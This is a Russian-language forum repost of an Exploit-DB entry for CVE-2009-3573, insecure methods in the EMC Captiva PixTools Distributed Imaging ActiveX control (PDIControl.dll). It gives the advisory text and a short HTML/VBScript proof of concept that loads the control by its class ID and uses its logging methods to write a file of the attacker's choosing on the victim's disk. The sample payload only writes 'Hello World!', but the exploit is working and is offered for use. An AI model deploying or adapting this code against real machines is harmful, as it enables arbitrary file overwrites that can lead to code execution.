Exploit EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33263
Проверка EDB
  1. Пройдено
Автор
GIUSEPPE FUGGIANO
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2009-3573
Дата публикации
2009-10-01
HTML:
source: https://www.securityfocus.com/bid/36566/info

The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll).

Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution.

PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected. 

<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script>
 
Источник
www.exploit-db.com

Похожие темы